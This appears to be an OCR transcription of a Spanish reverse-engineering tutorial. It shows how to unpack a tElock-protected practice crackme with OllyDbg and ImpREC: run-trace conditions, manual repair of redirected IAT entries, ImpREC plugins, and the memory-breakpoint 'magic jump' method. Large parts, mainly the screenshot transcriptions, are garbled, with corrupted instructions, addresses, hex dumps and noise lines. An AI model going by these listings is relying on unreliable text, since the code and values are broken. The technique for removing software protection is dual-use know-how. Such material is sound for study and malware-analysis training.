$5 


FS: [600090013]1=[7FFDOF61S]1=7FFOFO0O 
EAX=5009F17D4 


kernel32.GetUVersion 
Mddnnre llas dime nert 


Alli vemos justo abajo en la aclaracion que OLLYDBG nos muestra el nombre de la api lo mismo 
que al lado del valor de EIP. 


isters (FPU) 


ntdll.KiFastSystemCal LF 


ntdll.7C9207 


bit OLFFFFFFFF) 
it DLFFFFFFFF) 
2bit BFFFFFFFF) 


Otra condiciones posibles para el traceo desde el CALL para llegar hasta la api son: 


Condition to pause run trace 


Pause run trace when any checked condition is met: 


T— ElPisin range [000000000 Es [o0o0000d 


[4 ElP is outside the range [0401 000 pa | 129000 
T” Condition is TRUE =] 


| Command is suspicious or possibly invalid 


Command count is /o. (actual [12 ] Reset 


[Command is one of 


In command, R$, A32, RA, AB and CONST match any register or constant 


Cancel | 


Este caso es la inversa del anterior OLLYDBG chequea que EIP este fuera del rango de las 
secciones del exe, y las secciones que hay antes de la primera dll. 


Otra posibilidad 


Condition to pause run trace E 


Pause run trace when any checked condition is met: 


T” ElPisinrange [58000000 he I7FFFFFFF 


T ElP is outside the range [00000000 E] [00000000 
[Y Condition is TRUE [TESPI==4271de 28% byte [eip]==003 +] 


T Command is suspicious or possibly invalid 


Command count is jo. (actual [19. ] Reset 


[Command is one of 


In command, RS, R32, RÁ, AB and CONST match any register or constant 


Cancel | 


Para algun caso raro que el packer cree secciones mezcladas entre las dlls, puede utilizarse un 
metodo combinado como este que parara cuando halle un RET y ademas cuando la primera linea 
del stack sea 4271DC que es el retorno de la api. Este metodo apunta a parar en el retorno de la api, 
y muchas veces es efectivo sobre todo en packers que emulan las primeras lineas de la api y saltan a 
la tercera O cuarta linea de la misma, generalmente el RET siempre es respetado y parara en el 


mismo, si reinicio el OLLYDBG y llego de nuevo al call puedo probarlo rapidamente. 


O sea aquí se deben cumplir dos condiciones a la vez, que estan unidas por 48 lo cual asegura que 
sean las dos condiciones las que se cumplan 4 equivale a Y. 


Si fuera que quisiera que se detenga cuando alguna de las dos condiciones solas se cumpla, en ese 
caso usarla ll que equivale a O. 


O sea que 


[ESP]==4271dc 44 byte [eip]==0C3 
significa que se cumplan ambas condiciones a la vez, o sea 
[ESP]==4271dc (que la primera linea del stack sea el punto de retorno esperado de la api) 


byte [eip]==0C3 (y que el contenido de EIP o sea el byte que se esta ejecutando sea un RET o 
sea C3) 


Si desde el CALL lanzamos a tracear con esa condicion, vemos que para en el RET de la api. 


L= == — — —_—__—_ —_ 3 — HA A a a. a, a, a 


s631 BO00B0n: 


90 NOP 
5 64:A1 1800001 MOU EAX,DWORD PTR FS:[18] 
2643 30 


MOV ECX, DWORD PTR DS: [EAX+30] 
MOU_EAX, DWORD _PTR DS: [ECX+B0] 


BFB791 ACABA! MOUVZX EDX,WORD_PTR DS: [ECX+ACI 

33F0 FE 20R EAX, FFFFFFFE 

C1E0 BE SHL_EAX, BE 

BBC2 OR EAX, EDX 

C1E6 08 SHL_EAX, 8 

BBS1 ASOBBDO! OR EAX, DWORD PTR DS: [ECX+A8] 

C1E0 08 SHL_EAX, 

E A406B00! OR _EAX, DWORD PTR DS: [ECX+A4] 

54 DB 54 CHAR 
[Js] DB 40 

án nea adn FHOR 


=0C3 


Al dispararse ambas condiciones a la vez, se detiene el traceo.. 

Ahora que estamos en el RET, se nos complica saber el nombre de la api que ejecuto, pues no 
estamos en el inicio de la misma, lo mismo nos ocurre cuando el packer simula las dos o tres 
primeras lineaas de la api y estamos en la 4ta o 5ta linea de la misma, aquí OLLYDBG no nos 
muestra el nombre aunque hay varios recursos para hallarlo. 


Veremos en el listado de lo que traceo, para ello vamos al boton con los tres puntitos. 


1/E/m/T/w]n]c] /]x/B]r]-..] s| 
:(18] 


S: [EAX+30] 
5: [ECX+B0] 


LAA o lic E O AA OA iaa 1 1 1 Y O Y Y 1 y y 4. 


Back | Thread | Modu Le | Address | Command | Comment or message 
19. Main UnPackMe| 60427106| CALL OWORD PTR DS: [46B6ADCI 

18. Main BO9FBEF?| TEST ESP,ESP 

le Main OB9FOSF9| JNS SHORT BB9FBEFE 

16. Main DO9FBEFE | INC EAX 

15. Main DO9FDEFF | MOU EAX, 9F17D3 

14. Main BO9FO7O4 | INC EAX 

13. Main BDO9FO7OS pan DWORD PTR DS: LEAXI 

12. Main DO9FO?O7|R 

A Main kernel32 703114AB nO EAX, DWORD PTR FS: [18] 

10. Main kernel32| 7/C3114B1 U ECX, DWORD PTR DS: [EAX+3! 

9. Main kerne132| 7C3114B4 Hou EAX, DWORD _PTR_ DS: [ECX+B0] 
8. Main kerne132| 708114BA|M0UZX EDX,WORD_PTR DS: CECX+ACI 
6 Main kernel32| 7C8114C1|X0R EAX, FFFFFFFE 

6. Main kerne132|7C3114C4|SHL EAX, BE 

5. Main kerne132| 7C3114C7/|0R EAX, EDX 

4. Main kerne132| 7C3114C9| SHL_EAX, 8 

3. Main kerne132| 7C8114CC| OR EAX, DWORD PTR DS: CECX+A8] 
2. Main kernel32| 7C8114D2|SHL_EAX,8 

Té Main kernel32| 708114D5|0R_EAX, DWORD PTR DS: [ECX+A4] 
B. kerne132| 7C3114DB| RETN la 


Vemos obviamente que la primera linea que traceo en la dll es la marcada por la flecha, aunque no 
nos muestra el nombre de la api, asi que hagamos analisis del codigo, y luego hagamos doble click 
en esta linea que marca la flecha. 


EXE EST EE ESE El 0 0 0 8 Sika 


S04aal » DWORD PTR FS:L a 
Sb4 8 30 m0U E DWORD PTR DS: EEñR+30] 
TS E ESOO pas 
: + 
XOR EAX,FFFFFFFE 3 E A ntdll.KiFastSystemCal |Ret 


SHL_EAX, BE 


ESP a012FF4S 
SE Blocca Es e 
óBs1 Asaaagal OR EAX, DWORD PTR DS: [ECX+A8] E A era 
óBs1 Agooaaal OR_EAX, DWORD PTR DS: [ECX+A4] EIP 7C8114AB kernel32.GetUe 

c3 C O ES 0023 32bit M(FFFFFFFF) 


GS 6008 NULL 
LastErr ERROR_MOD_NOT_FOUND (60099 
EFL 90900206 (NO, NB,NE,A,NS, PE, GE, 6) 


STO empty LS ECEO 61050104 00BBBAAa 
ST1 empty 


ll 

AD 

za BLFFFFFFFF) 
5 E ES BO3B 32bit 7FFDFOBB(FFF) 
DO 

08 


STS empty 
ST6 empty 


us CC 44 06/08 B6 44 60/61 66 00 06/60 60 66 BBJAID.E:D.B....... 


2 0012FF4C 
24 AA17FFSA! FEFFFFFF 


Vemos que OLLYDBG nos muestra cuanto valian los registros en ese momento, por eso se ponen 
en gris ya que no son los valores actuales, y ademas nos muestra la informacion como si 
estuvieramos ejecutando esa linea, entre lo cual podemos ver el nombre de la api, lo mismo 
ocurriria si luego de un traceo vamos apretando la tecla menos, OLLYDBG ira hacia atrás 
mostrando la informacion y los valores que guardo al pasar por cada instrucción. 


En el caso de packers que emulan las dos o tres primeras lineas de la api y al tracear caemos por la 
cuarta o quinta linea, el traceador no pasara por la primera linea pues ellas son emuladas por el 
packer, por lo cual a veces hay que arreglarse un poco a ojo, pero un metodo casero que no falla es 
hacer lo siguiente jeje (perdon por lo berreta pero la verdad que sirve) 


En cualquier parte vacia abajo del ret escribimos con assemble, o apretando la barra espaciadora, un 
CALL a la linea que sospechamos es el inicio de la api visualmente, en este caso 


CALL 7C8114ab 


Parece el inicio de la api en mi maquina, en la suya ponen la direccion donde les parece visualmente 
que puede comenzar la api. 


¡Ej 


= 3.3 


Assemble at 7C8114DC 


[CALL rCalidab | y] 


4 Fill with NOP's Cancel | 


1 a Ai ias ) Y) 9 99 -) PP 3 _TIOY JP] 


0000000 100111 


PBEBLEBREBEDS LA 


405 


E TE 
64:A1 13800001 MOU EAX, DWORD PTR FS: [18] 
3B43 30 


MOU ECX, DWORD PTR DS: CEAX+30] 
3831 B0909001 MOU_EAX, DWORD _PTR DS: [ECX+B0] 
OFB791_ACOBB1 MOUZA EDx,WORD_PTR DS: [ECX+ACI 


33F0 FE Z0R EAX, FFFFFFFE 
C1E0 BE SHL_EAX, BE 

OR EAX, EDX 
C1E6 OS SHL_E 


AX, S 
BBS1 ASADO! OR EAX, DWORD PTR DS: [ECX+A8] 
C1E0 BS 


SHL_EAX, 8 


ne A400000l OR _EAX, DWORD PTR DS: [ECX+A4] 
ES CAFFFFFF [CALL 7C8114AB 
pal] [als] 


DB 
[ls] DB 60 
115] DB 08 
90 NOP 
an NMP 


kernel 32, GetVersion 


Al aceptar, si es el inicio de una api, OLLYDBG nos mostrara el nombre, si nos equivocamos 


podemos repetir con. 


Assemble at 7C8114E1 


ÍW Fill with NOP's 


[CALL vrCslidab - 1 +] 


Cancel 


Y asi en la zona alrededor de donde parece que se inicia la api, hasta que OLLYDBG nos de el 
nombre aunque es generalmente bastante facil darse cuenta de donde se inicia, por los corchetes que 
pone OLLYDBG al analizar, alli vemos que el corchete empieza en el inicio de la api. 


SJ Jas Jas Ja Ja Ja Ja 


2021 1dnP 


90 NOP 

64:A1 13800001 MOU EAX, DWORD PTR FS:[18] 

3B43 308 MOV ECX, DWORD PTR DS: CEAX+307 
3681 B090090l MOUV_EAX, DWORD _PTR DS: [ECX+B0] 
OFB791 ACOBO! MOUZX EDX,WORD_PTR DS: [ECX+ACI 


33F0 FE X0R EAX, FEFFFFFE 

C1E0 BE SHL_EAX, BE 

BBC2 OR EAX, EDX 

C1E6 OS SHL_EAX,S 

0BS1 ASOBOBO! OR EAX, DWORD PTR DS: [ECX+A8] 
C1E6 OS SHL_EAX, 8 


Es A4asanal OR_EAX, DWORD PTR DS: [ECX+A4] 
ES POFFFEFFE ÍFOII 7P21140R 


Quitamos lo que escribimos con UNDO SELECTION 


Bueno ya sabemos detectar a mano el nombre de la api, una vez que lo tenemos vamos al IMP REC 


(U8S114UZ|] +. LIEV US SHL_EHX, 3 
rc311405 [: E A400000! OR_EAX, DWORD PTR DS: [ECX+A4] 


borno!122 Rotllore inn 


3 
ES CAFFFFFF | CALL 7C8114AB 
ET DB 90 Backup 


Copy 
Binary 


Assemble » Space 


y hacemos doble click en la entrada mala que estamos reparando y ponemos el nombre bueno. 


IMPORT EDITOR 


A Module 


kemel32. dll 


Function 


ord:01D5 name:GetTimeZonelnformation 

ord:01D6 name:GetllserDefaultL CID 

ord:01D7 name:GetlUserDefaultl anglD 

ord:01D8 name:GetUserDefaultUlLanguage 

ord:01D9 name:GetlserñeolD 

ord:01D4, name:GetD MCurrentDirectories 

ord:01DB name:GetYersion 

ord:01DC name:GetYersionE xó, 

ord:01DD name:GetYersionE ww! 

ord:07DEÉ name:GetYolumelnformationá, 

ord:01DF name:GetYolumelnformatiorif 

ord:01£0 name:GetYolumeNameForYolumebmountPointá, 
ord:01E1 name:GetYolumeNameForolumemountPointa! 


Name [Getversion 


RAYA 


[0D050ADC | le Ea | 


p 
rwa:000604D8 ptr: DO9FOGE 6 


rea: 0006040 ptr. DO9FO7OS 


Ahora si apretamos SHOW INVALID vemos que dicha entrada ya es tomada como correcta lo cual 
es un gran beneplacito para nosotros jeje. 

Otra forma de reparar la entrada es escribir en el OLLYDBG en dicha entrada, la direccion de la api 
correcta en nuestra maquina. 


Alli esta la entrada que estamos investigando 460aDC, le sobrescribimos la direccion hallada de la 
api en nuestra maquina, habiamos hallado que la api GetVersion comenzaba en mi maquina en 
7C8114AB, pues escribimos dicha direccion en la entrada. 


etVersion) 


AB 14 8 Bs 
Bp2F 00 SA 12] 
68 00 A7 07 9F 60 ES 07 9F 66 [4 BD? 9F Y 
Br 00 F3 07 9F 00 61 BS 9F 00 24 08 9F Ol 
Bs bo 46 03 9F 06 53 BS 9F 00 68 BS 9F BM 
Mn fa Maa MA AA MA MAA AA MA 


A A AAA NOA A 


DIT SRT 


Alli vemos la entrada reparada ahora si en el IMP REC limpiamos todas las entradas apretando el 
boton CLEAR IMPORTS y de nuevo apretamos GET IMPORTS veremos que ahora la entrada esta 


tomada como valida. 


)- EH 


+ adwapr32. dll FI hunk:UVUBUSTS Nbrunc:5b decimal: 5] valid YE 5 
comct!32. dll FThunk:00060830 NbFunc:2 (decimal: 2] valid: YES 
1-2 FThunk:0006083C NbFunc:EB [decimal:235) valid: NO 

)- 2 FThunk:ODO60BEC NbFunc:439 [decimal:169) valid: NO 
winspool dre FThunk:00060E 94 NbFunc:8 (decimal:8] valid:YES 
comdlg32. dll FThunk:O0D060EB8 NbFunc:9 (decimal: 9] valid: YES 
1 ole32. dll FT hunk:O0060£E 0 NbFunc:10 (decimal:16] valid: ES 
oledla.dll FThunk:D00060F24 NbFunc:1 [decimal:1] valid:ES 


+ 


+) de) 


HA 


[El 


Show Invalid | 
Show Suspect 


Clear Imports | 


Log 


147 read successfully. 


> 87 Infos needed New 
| DEP [00027180 187 AutoSearch | YA hi 


RAYA [00060818 Size [00000710 
Load Tree | Save Tree | 


rva:DODE60A4DO ptr: DO9FOGBS 


rva:D00604D8 ptr: DO9FOGE 6 


rea: DOO604E 0 ptr:DO9FO7OS 


Como vemos es similar colocar la direccion correcta de la api en la entrada correspondiente 
directamente en la IAT en el OLLYDBG o en el IMP REC colocar el nombre de la API en dicha 


entrada. 


Bueno si hacemos eso en cada entrada redireccionada, y las reparamos una a una, y luego 
arreglamos el dumpeado, funcionara, el tema es que es un metodo muy tedioso, aunque es bueno 
conocerlo para verificar alguna entrada a mano si esta dudosa. 


Algo que ayuda a los fanaticos de este metodo manual es que el IMP REC permite guardar la tabla 
con las reparaciones que le hayamos hecho con el boton SAVE TREE y luego si interrumpimos el 
trabajo podemos volver al OEP del programa, abrir el IMP REC y una vez puestos los datos del 
OEP; RVA Y SIZE, cargar la IAT que habiamos guardado en el estado que la dejamos con el 
boton LOAD TREE. 


DEP [00027180 1AT AutoSearch [ RA 
Ava [ooos0s18 Size [00000710 


Load Tree | Save Tree | Get Imports | 


Otra forma posible de reparar las entradas redireccionadas es usando plugins del IMP REC, en este 
caso si vamos a la carpeta 


http://www.ricnar456.dyndns.org/HERRAMIENTAS/L-M-N-O-P/Plugin_Import/ 


Vemos que hay un plugin para telock el cual puede ser copiado a la carpeta plugins del IMP REC 
veamos si funciona este metodo. 


3) E: WEBIHERRAMIENTAS(L-M-MN-O-PiPlugin_ImportitELockD.' 


¿de archivo y carpeta £ »| tELocki. dll 


zar nueva carpeta 


blicar esta carpeta en Web 


Copiamos la dll a la carpeta PLUGIN del IMP REC. 


PULIDO TT A IT AA LI IS ILLA LA 


A 

wpeta £ (a Doc e) h 
ta —> 

= FILE_ID.DIZ = History, Ext 

== | Archivo DIZ == | Documento de texto 

= 1 KB = 16 KB 
en Web IMpREC ini 
ta ImportREC,exe Opciones de configuració 

1 KB 

ctrónico 
0 277 Nes, txt PSAPL.DLL 

== | Documento de texto A 5,0,2134.1 

= 1 KB UN Process Status Helper 

Sn | | 
Remote, dll A RemoteEx2. dll 
= Tips. txt 

idos RemoteEx, dll == | Documento de texto 


5 KB 


ucf2000.nfo 
Documento de MSInfo 
8 KB 


2 


Ahora deberemos reiniciar el IMP REC y una vez que volvemos a ingresar todos los datos, 
apretamos SHOW INVALID, hacemos click derecho PLUGIN TRACERS y buscamos el del 
telock, luego de tracear vemos que arregla todas las entradas menos 4, por lo cual vemos la 
importancia de la reparacion manual ya que el plugin dejo pocas entradas para reparar y estas 
pueden hacerse a mano. 


Alli vemos que el IMP REC nos avisa que quedan 4 por reparar, las cuales podemos tracear a mano 
con el metodo que vimos al inicio, de cualquier manera, el metodo del plugin es muy limitado ya 
que dependemos que exista un plugin para el packer que estamos usando lo cual es dificil. 


El IMP REC posee otros trazadores genericos que en vez de usar los del plugin, se puede intentar a 
ver si funciona, aunque recomiendo guardar lo reparado hasta ahora, porque la mayoria de las veces 
terminan en cuelgues del IMP REC. 


rva:D00060E 84 mod:user32. dll ord:0179 name:G 


rwa:00060€£ — Inwalidate function(s) 
+ winspool.drv FT] Disassemble | HexYiew | 


rya: DDO60B60 forwa Trace Level2 (Hook) 
AA Trace Level3 (Trap Flag) 


Current imports: 


Trace Levell (Disasm) », 


Marcando una entrada invalida y haciendo CLICK DERECHO vemos tres niveles de traceo, 
probemos a ver que pasa primero con el de NIVEL 1. 


RWA:D0060E88 Level Failed! 


Current imports: 

6 [decimal:6) valid module(s) 
18D [decimal 445) imported function(s). 
decimal: 4] unresolved pointer(s]] 


Fallo, probemos con los otros dos, ya con el segundo se colgo el IMP REC, por lo cual a pesar de 
mencionar estos metodos para otros casos, aquí no funcionan, y generalmente terminan en cuelgues 
solo sirven para packers muy sencillos. 


El proximo metodo es el del JMP-CALL MAGICO que hicimos popular en crackslatinos en tantos 
tutes de diferentes packers. 


El metodo se basa en tratar de buscar el momento en el que el packer guarda los valores en la IAT, 
y alli observar un poco y comparar lo que ocurre cuando guarda un valor malo, con lo que ocurre 
cuando guarda un valor bueno. 


Usemos como ejemplo la entrada esta que investigamos de GetVersion que es una entrada 
redireccionada o mala, reiniciemos el crackme empacado con telock, y busquemos dicha entrada al 
inicio antes de arrancar el programa. 


464655044 


BB456BADC e o ES 3D F9 F2 6 BO 9B 85 EB 16 2C 9B 64 A2| pBs= sdó 
BA46BAEC 80 F4 74 C9 77 C7 C3 AS/A9 Fi 32 42 RS ECUrOS MOS 2B 
Ba46BAFC ES De ÉS YA 7C C9 6E CA 89 9E AA F2 A2 89 81| ón 92 ¿Iri+éx>=068 ii 
004560B6C|2B 99 E9 A 42 69 A? El 3B 2E C9 7A EF 6D F4 +0uS'Bi0B;. [r2x + 1 


ARARARICIAN F2 1 AR FM 92 SA AÑ AN N2 Ma 91 AN. RA AR 9Ál lu k*úPf=FE».!Iled 


Alli esta en el DUMP la direccion 460ADC que al correr el crackme y antes de llegar al OEP, en 
algun momento se escribira alli el valor malo de la entrada redireccionada que en mi maquina era 
9F06F7, quiere decir que en algun momento el packer escribira ese valor en la entrada. 


[Address [Hex dump__ |] 
MUS BRDCHE? M6 9F 66 63 67 9F 66 1A 67 9F 66 24 Br 9F 4b . 

BAJSEBAEC 15] 15] 2 $.2- .$.3- 
epa 


Para interceptar el moemnto en que escribe dicho valor generalmente se coloca al inicio un 
HARDWARE BPX ON WRITE en la entrada, pero como este packer detecta los HARDWARE 
BPX, colocaremos un MEMORY BREAKPOINT ON WRITE, para que pare al escribir el valor 
malo. 


ECO MOIOR 
Emi 32 ¿rn Sero=ó él 
+0us* Bi2B;5.[r27.1 

¡Uk Pf EEz. || eú 
sep K. 9S30Y8=.re 
A 
USAL ISO Mudr 150s 


2 
9 
0 
S 96 
2 
6 
0 


Label - 


Breakpoint 


1004 0 A O A 00 00 0 07 00) O 4 


. 
Search for Al Memory, on write h 
BAC Find references Cerro! 


Al dar RUN la primera vez que para por MEMORY BREAKPOINT es aquí 


CEBA E piel $0) ul +] 1]e/mT]wjn]c]+[x]5/r] 


STOS BYTE PTR ES: [EDI] 
ASBOBCODAE | IMUL EDX,EDx, 4BCOBGBAS 

sTC 

INT 20 


! ROL EDXx, 1 
AQnE ?701FEECO | TM FRY FRY EDFF1F?A 


UnPackMe. 60465090 


Vemos que no es el lugar buscado porque al ejecutar la linea con F8 no guarda el valor malo en la 
entrada, asi que damos RUN nuevamente. 


La proxima vez que para es aquí 


mo A rr E O E 


PE a] EEN] ESTAN al +] 1jelmtiwjn]: 


3307 PTR DS: [EDI], AL 
ROR AL EL 
X0R AL,BL 
ADD EL,BYTE PTR DS: [EDI] 
ADC _BL,CL 


TEST CL, 1 
JNZ SHORT B046SFEO Un 


SHR_EBx, 1 


Tror rm n 


Vemos que tampoco guarda el valor malo en la entrada damos RUN de nuevo. 


RUL EBX, LL 
LEA EBX,DWORD PTR DS: [EBX 
sTOS_ByTE PTR ES: [EDI] 


POP EDI 
POP. ESI _ 


Tampoco luego de pasarla con F8 la entrada sigue con otros valores. 


EEE eu] vis] $0] e] + Ljejmr[wu]c]+]x/B)R]-.] 5] 


F3:A4 REP MOUS BYTE PTR ES:[EDIJ,BYTE PTR DS: [ESIJ 
SE POP ESI 


UnPackMe. 004660BB 


JMP SHORT 004660BB 
ADD DL,DL 
JNZ SHORT 00466136 UnPackMe. B0466136 


Seguimos buscando el punto donde guarda el valor malo, vemos que va parando pero nunca guarda 
el valor buscado. 


AB 12 
68 12 
1A 12 11 11 
ca 11 1 11 11 
7o 11 66 00 1 06 66/36 11 11 
2 11 66 00 B 06 Ba 10 10 
10 566 40 6 06 60 10 10 
10 66 Ba AB 56 60 10 : 10 
10 56 4n a 06 an 16 16 16 
10 566 4u FF 06 BB BF DC BF 
OF 66 4a F 06 66 BF AD BF 


Al pasar el ultimo REP MOVS la IAT quedo con estos valores y aun no tiene el valor malo 
definitivo, sigamos dando RUN. 


La] 44) X] ee ESES ESPE ac) PA 


004664E5 39 OU 
4E7 POP EAX 


83C0 69 EAX, 9 
ca ADD DWORD PTR SS: [EBP+40D456],EAX 
838D 52044000 [OR DWORD PTR SS: [EBP+40D4527,FFFFFFFF 


6l POPAD 
B3BD 4E0346000 [ADD EDI, DWORD PTR SS: [EBP+40D034E] 
35DB TEST _EBXx,EBX 


an 
m 
m 
m 
mn 
mn 
— 
LL] 
ul 


X BB4GBADC UnPackMe. 1046 
DO9FOGF? 
00400000 UnPackMe. 00400000 
4 BBBG12AD 
SP BB12FFAD 
' BBBSIISE 
5I 00460014 UnPackMe. 00460014 
BO9F166C 
> B04664ES UnPackMe. 004664E5 
=) PE i (FFFFFFFE) 
PO (FEFFFFFF) 
B OLERECERFF) 
É 


od 
= 
E 
=$ 
z 
O 
$ 
o 
o 
la] 
= 
Ed 
5 


—L0P 
a 


ECX es 9F06F7 y lo guardara en el contenido de EAX o sea en 460ADC en la entrada que estamos 
investigando, este es el punto donde queriamos llegar. 


+$.Ut+.c+e.n+e. 


160 12 06 ó qe Tie ide 13, 
1A 12 06 00 D2 12 D6 DB EE 11 06 08 D E 00 +te.Ote. de. 14e. 
EE e 0049140. 4e.ado. 


Vemos que al apretar FS guardo el valor malo, este es el primer paso que debemos hacer cuando 
utilizamos este metodo, ahora viene la parte mas trabajosa que es hallar el salto magico. 


[€] File View Debug Plugins Options “Window Help 


Ep mu QA > a 7] 


MOU EDI,DWORD PTR SS: [EBP+40D452] 
MOU EAX, DWORD PTR SS: [EBP+40D45A] 
ADD EAX, DWORD PTR SS: CEBP+40D34E] 
MOU ECX, DWORD PTR SS: [EBP+400456] 
a Ena PTR DS: [EAXJ,ECX 


ADD DDR PTR SS: [EBP+40D456],EAX 
UnPackMe, 004664FB 


paz PTR SS: [EBP+40D4527,FFFFFFFF 
ADD EDI, o PTR SS: [EBP+40D34E ] 


i 2EerS. C(FPU) 


> 


Ascl 1 Ger Vers ion” 


14 UnPackMe. 00460014 
D4 


ElP aR46es1A UnPackMe. 00466514 


Blcoa t OCFFFFFFFF) 
JE 00466509 UnPackMe. 00466508 0 L ACERFRFFFR) 
E tina z0 t DLFFFFFFFF) 
UNZ SHORT 00466522 UnPackMe. 00466522 = a t ?FFOFOBO(FFFI 


LEA EBx,DWORD_PTR_DS: [EBX+EDX+2] 
CMP_BYTE _PTR DS: [EBx1,0 


a UnPackMe. 00466583 
UnPackMe. 06466567 
Haz] EEN PTR SS: [ESP] 


E Uotcteos UnPackMe. 084665B3 


MOU ERX+ DWORD PTR $5: [EBP+40D348] 


a 
OFS4 93000090 

v| EB 45 

FFO4 


Como vemos al llegar a ese JE un poco mas abajo vemos en los registros, el nombre de la api que 
corresponde a esta entrada que acaba de llenar con el valor malo o sea GetVersion. 


———— pao A a dia ipaaa Y) PO YO YO Y) Y) Y $ 7 -7/;) y -/ »AGQAT AS 
S FEFFFF?F JAND EBX, "FFFFFFF 


PUSH EBX 

FFBS PUSH DWORD PTR SS: [EBP+40034A] 
CALL_DWORD PTR SS: [EBP+40BAE0] 

INC EAX 

DEC EAX 


POP ERX 
sTcC 


40034000 
kerne 132. GetProcAddress 


FF95 E6BA4000 


hPackMe. 00466561 


UnPackMe. 004662E7 
INC EDI 
INC ESP 
NFR. FAX 


Luego vemos que llega a una llamada a GetProcAddress para encontrar la direccion de GetVersion 
en mi maquina ya que los parametros son. 


s from UnPackMe. 00466574 
BBB [(kernel32) 
al = "GetVersion” 


+ 1C9IZ29REB 
7C98C003 
peasiana 


[fm 


B14 
D09F 1? ”D4 
: entera 


Es 
sTcC 


INC EDI 
INC ESP 
DEC ECX 
XOR ESI, DWORD PTR DS: [EDXJ 
TNP FSP 


UnPackMe. 004662E7 


Sunoré luna mrofiw 


Alli llegamos a un salto, el cual saltara veamos que pasa sin tracearlo, haciendo click en FOLLOW 


al + 1/Ejm]T/wjn/c)7[x]8]R]».. s| 


MOU DWORD PTR DS: [EDIJ,EAX 
POP EAX 

DEC_EAX 

INC EAX 

FS cLC 

ae FE MOU WORD PTR IN 


UnPackMe. 00466504 


MOU BYTE PTR DS: [EBxX1,AL 
INC EBX 
3303 CMP BYTE_PTR DS: [EBXJ,AL 


75 F9 UnPackMe. 004665BD 
8385 4E034008 1 ADD DWORD _PTR SS: [EBP+40D34E 7,4 


E9 BAFDFFFF JMP B046638A UnPackMe. B046638A 
Me A 


OA FT 14 


YC8114AB kernel32.GetVersion 
ECX 7C929AEB ntdll.7C9I29AEB 

EDx 7C98C0DS3 ntdll.7C98CODS 

EBxX 0461242 ASCII "GetVersion” 
ESP BB12FFAG 

EBP M0BS995E 

ESI 00460014 UnPackMe. 00460014 
EDI MB9F17D4 


EIP 00466570 UnPackMe. 60466570 


004665B 2907 MOU DWORD PTR DS: CEDIJ,EAX 
004665B3 53 POP EAX 
[515] 43 DEC EAX 
a 74 0D JE SHORT 00466504 
» INC EAX 
404665B3 Fe CLC 
0O4665B9| | 66:8943 FE MOU WORD PTR DS: CEBX-2], AX 
004665B 38803 MOU BYTE PTR DS: [EBXJ,AL 
O466SEF| | 43 INC EBX 
: 3803, CMP BYTE PTR DS: [EBXJ],AL 
l JNZ SHORT 00466580 
[Js] 38385 4E034000 1500 DWORD PTR SS: CEBP+40D34E],4 
E9 BAFDFFFF JMP 0046638A 
00 8306 14 ADD ESI,14 
” 


8B95 620340008 |MOU EDXx, DWORD PTR SS: [EBP+40D362] 


a 
90 E9 4SFCFFFF | JMP BB466226 
15) , 61 POPAD 

004665 c3 RETN 


Que nos devuelve al inicio del proceso porque al retornar del mismo ya el valor de EAX es 
machacado. 


Veamos con FOLLOW donde iria 


A0U ERX* BUORD PTR EJEA 


E5Cb TEST EAX, EAX 
y 75 0B JNZ SHORT 6046631 UnPackMe. B04663A1 
8846 10 MOU EAX, DWORD PTR DS:[ESI+10] 
25CO TEST EAX, EAX 
¡la OFS4 46FFFFFF | JE BB466LE7 UnPackMe. D04662E7 


93C2 ADD EAX, EDx 
0385 4ED034000 [ADD EAX,DWORD PTR SS: CEBP+40D34E] 
2B18 MOU_EBx, DWORD _PTR DS: CEAXJ 

| F7C3 6BBBBOSA | TEST EBX, 50009008 

v 74 6 JE_SHORT' 80466389 UnPackMe. 004663B9 


Alli se ve claramente que EAX en la segunda linea perdera el valor correcto de la api en mi 
maquina y seguro pasara a repetir el ciclo para la siguiente entrada asi que debemos estar cerca. 
Podemos fijarnos para entradas malas cuales son los saltos condicionales que saltan, para luego 


cuando traceemos para entradas buenas podemos comparar. 


Mucha veces yo me hago una tablita que suele ayudar mucho y es que en la rutina de este loop 
anoto que ocurre con los saltos tanto con entradas buenas como con entradas malas. 


PARA ENTRADAS MALAS (pondre imagenes de todos los saltos a medida que paso por ellos 
traceando, hasta llegar a donde guarda el valor) 


LEBALUBM)ooR+ES5BUBROO 1 1 111111111 BE 


004 $695 62034000 |M0U EDX, DWORD PTR 55: LEBP+40D3621 

00465390]  8B06 MOV EAX, DWORD PTR DS: [ESI] 

004 85Cb TEST EA, EAX 

a 75 DB UnPackMe. 004663A1 
6u4c6336| |8B46 10 MOU_EAX, DWORD PTR DS:[ESI+10] 

au466399| | esco TEST EAX, EAX 

00466398|+| OFS4 46FFFFFF | UE BOIGGLE? UnPackhMe. D04662E7 
oos6c3n11 Lazc2 ADD EAX, EDX 

6n4663A3| 0385 4ED34000 | ADD EAX, DWORD PTR SS: LEBP+40D34E] 


MOU EDx, DWORD PTR SS: [EBP+400362] 
MOU_EAX, DWORD PTR DS: [ESI] 
TEST _EAX, EAX 


MOUV_EAX, DWORD PTR DS: [ESI+10] 
TEST EAX, EAX 


EAX, EDX 
ADD EAX, DWORD PTR SS: CEBP+40034E ] 
MOV _EBX, DWORD PTR DS: [EAXI 
OE TEST EBX, 20000008 


e120 69900088 | AND DWORD PTR DS:[EAX], 300090000 
SB7E 10 MOU EDI,DWORD PTR DS: [ESI+10] 
ADD EDI, EDX 

S0N5 DECC4900 | AND BYTE PTR SS: CEBP+49CCD6],0FF 
30010000 | JE M04664FB UnPackMe. 004664FB 
8545 D7CC4000 [AND BYTE PTR SS: [EBP+49CCD7],0FF 
23010000 | JE M04664FE UnPackMe. 004664FB 
89BD 5AD44008 |MOU DWORD PTR SS: CEBP+40D45A9],EDI 
8685 52044000 pes ER, DWORD PTR SS: [EBP+40D452] 


10010000 
B2000000 


UnPackMe. 00466341 


3 35Ca 
| 0F84 46FFFFFF 
B3c2 
0385 4E034000 
3B18 


UnPackMe. 004662E7 


UnPackMe. 604663B9 


£ 

o 
5] 
co 
La 


DO 
DE 


DOE 
DO 
< 
o 
E] 
co 
Le 


E 
Ho 
e 

co 

Le 


UnPackMe. 004664FB 
DEC EAX 

UnPackMe. 00466494 
PLUSHAD 
MU FST.FMT A 


MOU EDxX, DWORD PTR SS: LEBP+400362] 
MOU_EAX, DWORD PTR DS: [ESIJ 


Dl 


06 >| 85C0 TEST EAX, EAX 

0 y 75 0B JNZ SHORT M04663A1 UnPackHMe. 004663A1 
00 | 8B46 10 MOU_EAX, DWORD PTR DS: [ESI+10] 

06 | 85c0 TEST EAX, EAX 

